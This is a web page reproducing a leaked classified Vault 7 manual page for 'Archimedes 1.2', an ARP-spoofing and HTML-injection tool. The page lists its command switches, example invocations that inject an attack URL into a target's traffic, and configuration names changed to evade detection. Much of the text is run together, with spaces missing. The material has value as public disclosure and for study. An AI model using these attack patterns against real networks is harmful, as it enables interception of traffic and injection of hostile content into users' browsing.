Vault 7: Projects

This publication series is about specific projects related to the Vault 7 main publication.

SECRET//NOFORN
2
SECRET//NOFORN
(U) NEWFEATURES
(S)IMPROVEDARGUMENTPARSING
(S//NF)Asmoreoptio nshavebeenintroduced,theoriginalparameterparsingapp roachwhichrelied onthe
argumentorderhasbecomedifficulttouse.Archimedes1.2modifiesthetooltorequireparameterswitchesin
commandlinespassedtotheEXEand DLLbuilds.Thissimplifiestheargumentspecificationbyreducingthe
numberofparametersrequiredandeliminatingthedependencyonargumentordering.
ARCHIMEDES 1.2 USAGE
REQUIRED
-t [Target MACAddress]
-g [Gateway MACAddress]
OPTIONAL
-u [Injected URL, required except for SURVEY_ONLY (SO) method, No default]
-d [MILLISECONDS_BETWEEN_SPOOFS, Optional, Default: 1000]
-v [VERIFY_ROUTE (TRUE/FALSE), Optional, Default: FALSE]
-m [INJECTION_METHOD, Optional, Default: SO]
-p [PORT for HTTP monitoring, Optional, Default: 80]
-w [HOST_WHITELIST Optional, Default: (empty)]
Example:
1) f32.exe -t 00:0C:29:BD:34:45 -g 00:0c:29:61:d0:d7 -m SO
2) f32.exe -t 00:0C:29:BD:34:45 -g00:0c:29:61:d0:d7 -u http://10.0.0.11/attack.html -v
FALSE -m HI -w www.mytest.com,mytest.com,www.yahoo.com
(S//NF)Spacesbetwe entheswitchandtheargumentareoptional.Pleaseseethe“APPLICATIONDE FAULTS”
sectionbelowforinformationonthedefaultvaluesofeachconfigurationvalue.NotethattheinjectedURLvalue
isrequired,exceptforSURVEY_ONLY(SO)mode.
(U)RENAMEDCONFIGURATION ITEMS
(S//NF)Thefollowingnamesusedintheencryptedconfigurationfilehavebeenchangedtoavoidhaving“alerting”
stringsonthetarget:
OLDNAME
NEWNAME
DESCRIPTION
VICTIM_MAC VM Target’sMACaddress
HIJACKED_MAC
HM
MACaddressofthegateway(hijackedaddress)
MILLISECONDS_BETWEEN_SPOOFS MS TimebetweenARPspoofs
INJECTED_URL
IU
URLthatwillbeinjected
INJECTION_METHOD IM HTMLmethodsusedtoinjecttheURL
USABLE_MEDIA_TYPE S
UM
HTMLcontenttypetoinjectagainst
USER_AGENT_WHITELIST UW Onlyattacktheseagents
USER_AGENT_BLACKLIST
UB
Don’tattacktheseagents
VERIFY_ROUTE VR Sendverificationpacketbeforeattack
PORT
PT
PorttomonitorforH TTPtraffic
HOST_WHITELIST HW Listofhoststhatcanbeinjectedinto

e-Highlighter

Click to send permalink to address bar, or right-click to copy permalink.

Un-highlight all Un-highlight selectionu Highlight selectionh